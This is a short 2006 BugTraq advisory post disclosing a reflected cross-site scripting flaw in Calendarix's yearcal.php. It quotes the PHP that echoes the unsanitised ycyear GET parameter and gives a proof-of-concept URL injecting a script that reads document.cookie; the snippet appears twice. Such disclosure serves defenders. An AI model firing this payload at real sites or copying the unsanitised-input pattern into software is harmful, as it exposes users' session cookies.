BugTraq
Back to list
|
Post reply
Calendarix "yearcal.php" XSS Attacking
Apr 16 2006 05:50PM
botan linuxmail org
Website : http://www.calendarix.com
Vulnerable :
if (!isset($_GET['ycyear']))
$ycyear = $y ;
else
$ycyear = $_GET['ycyear'];
http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.coo
kie)</script>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable :
if (!isset($_GET['ycyear']))
$ycyear = $y ;
else
$ycyear = $_GET['ycyear'];
http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.coo
kie)</script>
[ reply ]